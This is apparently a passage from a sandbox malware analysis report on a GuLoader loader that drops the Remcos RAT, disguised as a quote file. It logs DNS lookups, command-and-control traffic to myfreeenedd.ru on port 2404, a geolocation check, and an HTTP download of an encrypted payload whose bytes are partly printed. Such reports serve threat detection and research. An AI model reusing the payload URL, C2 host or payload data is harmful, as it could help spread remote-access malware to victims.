                                                                                                  Dec 2, 2024 14:43:24.754314899 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.754358053 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.755440950 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.755702972 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.755740881 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:24.756534100 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.804311037 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:24.804409981 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:27.024043083 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:27.145828009 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.145844936 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.145865917 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.145900011 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.145927906 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:27.145971060 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:27.145999908 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.146012068 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.146121979 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.146132946 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.146203995 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.146224022 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266083956 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266100883 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266135931 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266174078 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266258955 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266268969 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.266525030 CET24044979266.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:27.269794941 CET497922404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:52.682527065 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:43:52.684573889 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:43:52.804841995 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:44:22.744148970 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:44:22.745636940 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:44:22.865747929 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:44:52.825707912 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:44:52.827486038 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:44:52.947669029 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:45:00.811491966 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:01.232930899 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:01.920392990 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:03.232948065 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:05.733064890 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:10.623616934 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:20.232928038 CET4979380192.168.2.6178.237.33.50
                                                                                                  Dec 2, 2024 14:45:22.839191914 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:45:22.840675116 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:45:22.960836887 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:45:52.890718937 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:45:52.892008066 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:45:53.012255907 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:46:22.951445103 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:46:22.982300043 CET497852404192.168.2.666.63.187.246
                                                                                                  Dec 2, 2024 14:46:23.102401018 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:46:53.002501011 CET24044978566.63.187.246192.168.2.6
                                                                                                  Dec 2, 2024 14:46:53.045731068 CET497852404192.168.2.666.63.187.246
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 2, 2024 14:43:10.853147984 CET5432053192.168.2.61.1.1.1
                                                                                                  Dec 2, 2024 14:43:11.877484083 CET5432053192.168.2.61.1.1.1
                                                                                                  Dec 2, 2024 14:43:12.013164043 CET53543201.1.1.1192.168.2.6
                                                                                                  Dec 2, 2024 14:43:12.015189886 CET53543201.1.1.1192.168.2.6
                                                                                                  Dec 2, 2024 14:43:17.502645969 CET5095553192.168.2.61.1.1.1
                                                                                                  Dec 2, 2024 14:43:17.944366932 CET53509551.1.1.1192.168.2.6
                                                                                                  Dec 2, 2024 14:43:20.777159929 CET6207553192.168.2.61.1.1.1
                                                                                                  Dec 2, 2024 14:43:20.915530920 CET53620751.1.1.1192.168.2.6
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 2, 2024 14:43:10.853147984 CET192.168.2.61.1.1.10xea6fStandard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:11.877484083 CET192.168.2.61.1.1.10xea6fStandard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:17.502645969 CET192.168.2.61.1.1.10xaf79Standard query (0)myfreeenedd.ruA (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:20.777159929 CET192.168.2.61.1.1.10x5e44Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 2, 2024 14:43:12.013164043 CET1.1.1.1192.168.2.60xea6fNo error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:12.013164043 CET1.1.1.1192.168.2.60xea6fNo error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:12.015189886 CET1.1.1.1192.168.2.60xea6fNo error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:12.015189886 CET1.1.1.1192.168.2.60xea6fNo error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:17.944366932 CET1.1.1.1192.168.2.60xaf79No error (0)myfreeenedd.ru66.63.187.246A (IP address)IN (0x0001)false
                                                                                                  Dec 2, 2024 14:43:20.915530920 CET1.1.1.1192.168.2.60x5e44No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                  • www.healthselflesssupplies.co.za
                                                                                                  • geoplugin.net
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649793178.237.33.50805712C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 2, 2024 14:43:21.038033962 CET71OUTGET /json.gp HTTP/1.1
                                                                                                  Host: geoplugin.net
                                                                                                  Cache-Control: no-cache
                                                                                                  Dec 2, 2024 14:43:22.285468102 CET1171INHTTP/1.1 200 OK
                                                                                                  date: Mon, 02 Dec 2024 13:43:22 GMT
                                                                                                  server: Apache
                                                                                                  content-length: 963
                                                                                                  content-type: application/json; charset=utf-8
                                                                                                  cache-control: public, max-age=300
                                                                                                  access-control-allow-origin: *
                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.649769164.160.91.324435712C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-02 13:43:14 UTC201OUTGET /GKSZQPVYFBHuSxeCc116.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: www.healthselflesssupplies.co.za
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-12-02 13:43:14 UTC404INHTTP/1.1 200 OK
                                                                                                  Connection: close
                                                                                                  content-type: application/octet-stream
                                                                                                  last-modified: Tue, 26 Nov 2024 05:14:54 GMT
                                                                                                  accept-ranges: bytes
                                                                                                  content-length: 493120
                                                                                                  date: Mon, 02 Dec 2024 13:43:14 GMT
                                                                                                  server: LiteSpeed
                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                  2024-12-02 13:43:14 UTC964INData Raw: 9c 87 68 0e 2f 7c b5 97 e4 46 45 fe 27 fd ef 3f 2d 87 d4 60 5c f4 ba 3c d6 e5 09 d6 77 39 d1 4c 8c 99 6b 57 f9 fe 60 5e 7e e2 5d 68 50 f9 da b1 6e 7f 12 93 f4 13 60 5b cf e8 1d e7 c7 5b 8a cc f7 a3 a5 0a f2 fe 81 ee 18 5f 50 79 68 a2 49 00 a0 3a bc cd 6d 75 34 b2 8b d9 aa f1 f6 1a 32 40 26 65 12 8b 5f d8 a9 12 a9 bf 00 56 e0 94 34 57 76 db 13 18 c0 e8 d7 97 b1 52 dc 4e b5 83 4d a1 9c b4 06 81 84 21 61 02 71 79 43 de 23 a4 22 b2 4c 48 c1 65 dc 2e 83 e2 9d 10 aa 6b 66 5d 1f b8 b2 18 3f 3b 8e 28 c4 38 c6 83 9e 43 88 84 e4 d1 10 52 0b ee 82 89 54 d2 8a 84 bb 41 80 4c 0c 3a 8e 0b 58 96 6c 10 1d 23 cc 37 85 79 9d cc ec 65 72 85 77 a1 86 d0 ed e7 f0 b5 79 4d 3b 58 68 44 0b 7a e8 77 e6 9a 4c ed 60 f1 ce 2d c0 bd d1 cf 8d f0 29 06 e7 21 d2 e8 be 1e ec 0a 28 98 cb
                                                                                                  Data Ascii: h/|FE'?-`\<w9LkW`^~]hPn`[[_PyhI:mu42@&e_V4WvRNM!aqyC#"LHe.kf]?;(8CRTAL:Xl#7yerwyM;XhDzwL`-)!(
                                                                                                  2024-12-02 13:43:15 UTC14994INData Raw: ce f4 9e 58 df 41 eb ae 3b 85 2e ac c8 12 59 6f 58 65 b4 a7 fd e0 72 ed 31 78 a3 f9 67 33 3f 48 24 12 f7 a5 9a 10 54 af ee 13 86 1f 7f e4 31 f2 7d c4 64 cf e8 8f fd 2d 53 a9 d9 03 18 e1 04 52 e8 c4 67 71 e8 0a e0 6c 2d d5 c4 45 17 8a d2 5a df a2 df 21 c3 fe 3d 77 54 c6 f7 59 1f 7d 7a 1f 9f 56 5e 38 80 80 0b 1a 5b bc 3e 72 4c 31 83 21 02 d2 06 57 34 5e 81 0e 55 4a ab 26 73 75 8f 0f 6b e4 1b b4 ed 24 53 69 b8 e8 9a 5a 08 98 4e 04 fd 59 81 8b d2 9b 3a 93 8e 26 33 6f 67 4b a0 65 7c 44 a6 73 85 29 57 ad 4f 38 eb 19 b5 71 f3 d2 c4 56 1a 8a 00 22 1c 92 33 1c 3d 14 aa 38 e9 79 8d b3 ea 7e 67 3a b8 c4 97 3b ef ac e7 45 33 04 7e 23 18 fb 25 3b f4 81 87 b1 a7 f8 c4 5b 00 b5 a4 c6 38 87 bc ea ff 2b 24 97 2b 5b 08 2c 67 83 5d 0a ff 28 91 72 31 f9 f6 4f 27 b3 6e 0d a1
                                                                                                  Data Ascii: XA;.YoXer1xg3?H$T1}d-SRgql-EZ!=wTY}zV^8[>rL1!W4^UJ&suk$SiZNY:&3ogKe|Ds)WO8qV"3=8y~g:;E3~#%;[8+$+[,g](r1O'n
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: e1 1c dc a3 30 90 88 5d 6c dd ba e8 a9 a9 6b 3e 87 b9 cf 9a 7e fb 9b 0e a5 1d 3c 8c 18 3b 0f cf 69 9c d5 93 03 de 9f 95 9f 95 83 1c b6 2e 44 bd dc 37 c3 d1 b6 2d ea 1e b2 e6 5f f1 2f d0 58 c7 54 24 18 7c 6f 5b 1d a8 3e 81 f1 56 cf a2 a5 01 55 79 6e 01 c2 ba 0e 23 ed c1 fc 3a 99 59 8c 0a ec b2 72 d5 9e 1c 89 ac 5f 26 67 cd 46 a3 07 cb 0d a7 89 95 e1 a7 db a2 26 1e eb ac 58 43 d3 23 5e 49 8b ad c7 6d d0 d5 e8 74 f2 9f 3d b7 ca 45 0d 0f 36 5c f4 9c ed c2 9e 45 ae ef 51 71 2d 17 64 5d 47 33 1d f9 50 b6 3c 66 46 d3 da 07 a0 1b 82 85 f3 76 ad 1c da 05 fa 54 18 ce 33 b3 75 fa f3 81 1a fa 97 0c e0 ff 30 2d 9c fe f3 0c af 26 6a 6b 39 a9 e5 4a 65 28 0e e9 52 dd 75 d4 51 c1 21 b7 ee c4 8e 77 f2 29 7a de be b6 6d d1 2d b9 64 14 b2 9b fc f9 a2 74 4d b2 3d c7 d2 2c 79
                                                                                                  Data Ascii: 0]lk>~<;i.D7-_/XT$|o[>VUyn#:Yr_&gF&XC#^Imt=E6\EQq-d]G3P<fFvT3u0-&jk9Je(RuQ!w)zm-dtM=,y
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: 10 a6 09 94 0b c0 c3 4b c5 72 82 52 61 8c 82 09 72 46 3b 86 75 f4 75 26 d5 6c 08 c9 ef 6a ec 9d 30 49 af e7 c5 f6 b7 79 f4 04 0d 25 c7 ff 96 bc 71 6e a9 ef 9e ab 2a 30 31 32 d3 62 59 d2 f0 97 fb cb d2 de 60 16 5a 74 f2 ef 05 d2 7d ab dd 03 a5 1b 8c 9e 9d 95 41 e7 41 ce f3 46 8c 50 7f e2 25 e2 89 96 0e d5 60 03 1d 3b 82 ed 6d 0d 57 5d f2 49 79 e3 2d b6 f7 a3 6d 07 6f a3 29 b1 42 e3 e7 39 71 89 f2 a6 75 de 45 4e d3 8e 8d 7e 58 1b d3 46 20 07 60 f9 1a 8b 59 fd 89 eb 38 f0 29 27 bf e7 df 09 b8 5c b2 48 f9 42 10 1b 38 32 12 22 d0 74 da 19 76 b8 51 ec 76 56 ef 57 b5 a3 56 2e 19 9f ce c6 20 07 31 5f e4 90 9b c6 0d 71 eb 69 31 cb 3d 67 d5 9f 22 1b 0e 98 b2 77 27 e9 39 f6 df a7 ad a3 59 bc 1e 94 ca 96 af bd da f9 3f 55 f6 cd 85 4c 7c c9 f6 0e 01 91 e1 98 e4 50 79
                                                                                                  Data Ascii: KrRarF;uu&lj0Iy%qn*012bY`Zt}AAFP%`;mW]Iy-mo)B9quEN~XF `Y8)'\HB82"tvQvVWV. 1_qi1=g"w'9Y?UL|Py
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: 74 a7 1a 27 22 88 da 78 80 71 49 87 f0 d0 b5 9d 01 b0 0e e7 be c2 8f da 24 f9 62 03 71 49 c4 67 1b 8d 3d a0 5b e0 ff 30 31 f0 8c 35 90 83 5e ee db 46 61 56 f1 20 4a da d8 24 9d b8 7b 10 1a 74 a7 61 a7 52 0d cf ee d3 34 7d 53 37 9f 15 4b 70 8d 1c f4 02 1f ff a1 15 08 4b 66 34 cc c0 c5 68 36 e7 4d 0c 43 ab 50 65 d4 d9 41 24 6f d4 af be 14 ac 8f e8 55 35 6d 53 52 11 43 18 e4 cd 12 e8 cb ae 31 e8 d2 29 2c 2d 6e 0d 05 17 48 1b 1a df 6b 16 61 c3 ab b6 9b d7 22 0f da f3 41 f7 52 93 00 b6 eb d3 7f f4 70 a4 d6 3a ff 01 3d 08 11 8f 96 22 67 64 b6 10 7e aa b5 28 ca d2 9e 7e 20 83 32 14 ba 05 fb 6f 3d 2b 2e 76 aa 14 f4 69 5c 2f 56 68 1b 3f 88 c5 84 89 65 17 5b e7 33 28 20 7c 2f 19 6b 05 d7 2b 61 73 25 d6 5e b5 72 8f b7 a0 a9 67 c5 1e 22 1c f9 6b 48 25 53 f3 fb f6 d6
                                                                                                  Data Ascii: t'"xqI$bqIg=[015^FaV J${taR4}S7KpKf4h6MCPeA$oU5mSRC1),-nHka"ARp:="gd~(~ 2o=+.vi\/Vh?e[3( |/k+as%^rg"kH%S
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: f2 2f 82 2f 95 0b 74 61 1e 19 6d 14 93 3a 57 f0 e6 23 1c 4d bd ed 2f 31 8f 1f 3d f7 e6 8e 17 08 9e da aa d3 f9 ea ff 84 6b d8 10 73 f5 1f 1f 91 c1 6d 17 e3 af d9 88 6a a9 01 8f a5 11 6a b8 06 c8 b1 70 44 1c e5 52 1b ba a1 62 51 27 be 21 60 11 aa e6 a3 03 f8 75 7c 1c b0 b2 c3 ac 2c d0 1d 5e 0a 4e 02 c2 ce 7b 0f e8 db 32 31 72 b9 5f 74 53 7b b2 f2 51 f2 8f 14 7f 1a 20 63 2b 48 90 cd c1 8c b4 91 74 94 4b 71 53 b0 60 6d 28 7d 06 0f 47 96 df 12 96 1f ac af fc 60 f4 b3 34 51 98 0b 87 8d cb 47 52 05 83 19 86 81 2c 28 54 6c 13 e1 a2 1d 2f 0f ab 4a 14 ec 51 c5 ce 29 68 8e d5 0d e3 a0 55 82 f6 5a fa 96 a6 92 b1 69 db 19 b0 94 bd e7 64 62 17 ba cc 0b 78 5b a1 da 2b 6c 5f 3f b5 7e c6 0c 1a 04 d1 2d 0d a8 72 2a ec 6a f0 7e b1 9f 05 cd 3d ea e3 e9 27 69 99 95 c8 76 af
                                                                                                  Data Ascii: //tam:W#M/1=ksmjjpDRbQ'!`u|,^N{21r_tS{Q c+HtKqS`m(}G`4QGR,(Tl/JQ)hUZidbx[+l_?~-r*j~='iv
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: be fb ea ea 0c 76 0e c5 9f 33 3d 95 a3 b7 e5 ab 27 f1 0b 95 49 eb 33 87 a7 dd e7 1e 61 9b 4b 7e 90 1d 21 2f 3a fd 4e 52 10 85 7f 45 13 49 c3 99 eb 1a a6 af 12 bf dd 6b 2d f2 29 d4 1c a6 76 ba 31 8e 88 3e 52 d6 51 b3 3c 4b 92 2d 4d 18 9f aa a4 a0 79 b3 17 62 dd 89 c3 fc a7 c3 3e a2 db 77 43 6a 2a af f1 be bc 64 06 8c d1 d0 2e ec 82 29 8f eb 71 17 e1 11 a4 37 2c 26 a5 36 a0 87 37 e1 4c f8 e2 a2 73 f6 8a c3 9e 2a 9f d8 58 a2 cc 7b ac 2d 34 24 ec 7e 57 f3 c4 e4 55 52 a1 68 da a8 ed d4 85 b8 a9 3b b6 fe c2 3a e9 3e 06 ba e2 03 3b 69 2b cb b8 b7 15 48 03 b1 33 2f 4e 8d fa fb fa ba 70 10 34 c6 dc 47 5b 11 ba 18 ae 03 49 88 b5 b2 25 02 08 6d b7 f6 6a 4d 35 6e f7 8f e0 72 df de 62 5a cd 75 f9 10 45 c7 d5 e6 54 ef 98 d7 3a ac a8 f2 43 c6 4b 38 97 a4 1e 6f 5d 4c 20
                                                                                                  Data Ascii: v3='I3aK~!/:NREIk-)v1>RQ<K-Myb>wCj*d.)q7,&67Ls*X{-4$~WURh;:>;i+H3/Np4G[I%mjM5nrbZuET:CK8o]L
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: 76 9d 26 fa 6b 4b 9f af e7 37 df e3 d2 49 91 29 07 47 5c 9f 0c 5d 86 61 8d ab 4a 51 d1 38 77 f5 c0 24 28 68 ff 1c 57 a8 6b 5f 91 ed 0b 5b da be 6b 42 4f fc c4 01 aa 2e 48 57 5e 0e f6 c4 80 9b 44 aa 22 32 e7 a4 6e 13 24 6c ef dc 78 ad 7b 4f 1c de 96 f4 6d 33 8d 06 b5 c3 07 ea 33 e2 b5 6e a0 3a 73 0b 63 a2 44 ab eb 37 62 b9 4e 32 cc 78 da 61 17 a7 92 cb e1 9c 8d 2f 02 41 89 e6 ad 52 56 22 c1 7c 52 89 87 c8 87 81 da ac ab 90 fd 4c bf 2f 1e 1a 54 47 f1 98 20 d3 6a 4a f6 32 92 bb 06 d4 1e 83 11 ae 96 f4 7f 51 d7 fb fc dd 8a f0 4e c9 be f1 a3 be 62 a5 fe fb 2f 78 0a 97 9d 14 f2 ed f1 0a 19 5d b3 d8 af 58 63 f3 f0 b8 83 e6 c9 4f 77 3d ee 43 37 e2 5e 96 db 8c 19 a7 4e c7 af 8e 3d db d4 9e 37 70 0c 73 dc 5c a8 f9 ab 14 16 b5 dd d2 85 7c 6b 0e 29 b5 4e dc 8b 28 cc
                                                                                                  Data Ascii: v&kK7I)G\]aJQ8w$(hWk_[kBO.HW^D"2n$lx{Om33n:scD7bN2xa/ARV"|RL/TG jJ2QNb/x]XcOw=C7^N=7ps\|k)N(
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: 28 43 df 21 f2 f6 48 e9 d9 4a 17 f1 33 01 eb 13 94 b7 08 08 b7 b5 57 35 14 77 78 7e bc 75 74 d9 b7 2f d6 87 12 0d 80 a8 38 16 2d 82 28 20 0d 14 0d 23 46 79 85 c8 af 60 d2 6b c3 c4 d1 6f f9 17 9e 30 86 df 23 1c 83 ff 6a 8a 62 28 4b d3 cb b3 ae ae 28 29 d0 04 f9 5a 41 12 ef 9f 2e 7e d6 e2 33 b0 ad d9 cc a5 3b 34 d8 36 ca 29 9d 7c 54 45 8a 00 3d bc 04 4c a5 10 3c 48 c0 eb 1c 57 eb a0 83 ec 36 2e 00 6b 51 2c 25 a4 54 4b 11 88 41 a6 4f d6 ef 5f 9e bd 67 46 4b 77 3a c2 1d 02 b0 c4 41 be 62 a6 cf 7e 33 d4 ae 0f 95 e2 d1 80 5c d7 d5 78 fe f6 90 fb 7b 3b 32 bb 0b 06 82 e1 ee 79 af 69 2a de a9 11 43 34 01 20 b8 16 14 2c 3f 54 fe a7 10 7d 3b 16 84 c9 a0 8c 48 33 ed ce e4 b4 cb 7c 74 cd ba 5a f7 0b ec d2 f1 f2 fc e3 73 68 13 ce 61 43 81 b3 db bb 8d de 77 b4 8f 82 cc
                                                                                                  Data Ascii: (C!HJ3W5wx~ut/8-( #Fy`ko0#jb(K()ZA.~3;46)|TE=L<HW6.kQ,%TKAO_gFKw:Ab~3\x{;2yi*C4 ,?T};H3|tZshaCw
                                                                                                  2024-12-02 13:43:15 UTC16384INData Raw: e5 f5 35 0e a8 94 cf 91 f5 fa 3a 9d a8 44 73 cc 5d 99 1c d0 fa b1 65 5b 39 c6 c3 80 6d 5d c3 76 1e e9 74 9f 15 ac 2b 5d b5 23 94 1f 66 19 9b 8c 4f b4 5f 8c 32 ae 5d c9 b3 69 fa 96 8b e2 33 33 35 a0 59 d8 6e ee 26 93 53 cf 05 c3 65 49 31 35 97 ea 38 06 54 90 bd c5 ab e7 2c 35 61 5b a0 e4 30 fd 0e fd 98 a9 9c 61 e9 80 6a bd c6 49 36 d3 30 4d 2b e9 b2 1d c6 02 57 58 49 03 a7 74 fc 86 1e 98 eb 55 ab 85 c0 a2 7f 34 30 7d 8f 16 0d 30 d6 61 71 97 1b 78 f7 a7 1e 69 88 d4 b3 56 03 dd 8c 5b 33 2c 8f 91 96 d9 ba bf cc ce a4 86 d4 fe 77 4e 7a 30 57 69 cc cd de b5 fc de aa b2 9a 48 47 66 b6 31 50 91 61 46 41 43 b7 46 41 83 22 84 38 8c 2b d8 22 3b cb ea 26 7b a7 9b de b7 88 8a 81 2a a5 af ea dd ca 5d 7a b7 21 16 b2 83 4d 16 41 b2 ea ee 5c 18 2b 79 af e5 8c 6f b3 8b cc
                                                                                                  Data Ascii: 5:Ds]e[9m]vt+]#fO_2]i335Yn&SeI158T,5a[0ajI60M+WXItU40}0aqxiV[3,wNz0WiHGf1PaFACFA"8+";&{*]z!MA\+yo


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:08:42:35
                                                                                                  Start date:02/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Quote Qu11262024.scr.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:840'424 bytes
                                                                                                  MD5 hash:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2293548883.0000000004EEA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:08:42:51
                                                                                                  Start date:02/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Quote Qu11262024.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Quote Qu11262024.scr.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:840'424 bytes
                                                                                                  MD5 hash:A75036F188683604D03DD8F03FEE6EC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
